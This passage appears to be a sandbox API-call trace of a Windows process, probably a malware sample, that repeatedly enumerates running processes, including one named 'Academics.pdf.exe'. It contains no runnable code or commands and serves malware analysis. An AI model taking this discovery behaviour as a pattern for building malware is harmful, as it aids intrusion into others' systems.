hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0305.862] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0305.862] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0305.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0305.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0305.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0305.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0305.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0305.864] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0305.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0305.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0305.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0305.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0305.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0305.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0305.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0305.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0305.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0305.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0305.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0305.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0305.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0305.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0305.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0305.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0305.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0305.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0305.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0305.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0305.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0305.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0305.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0305.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0305.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0305.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0305.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0305.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0305.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0305.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0305.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0305.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0305.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0305.908] CloseHandle (hObject=0x294) returned 1 [0305.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0305.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0305.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0305.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0305.908] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0305.908] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0305.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0305.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0305.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0305.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0305.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0305.911] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0305.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0305.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0305.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0305.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0305.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0305.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0305.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0305.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0305.932] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0305.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0305.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0305.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0305.937] 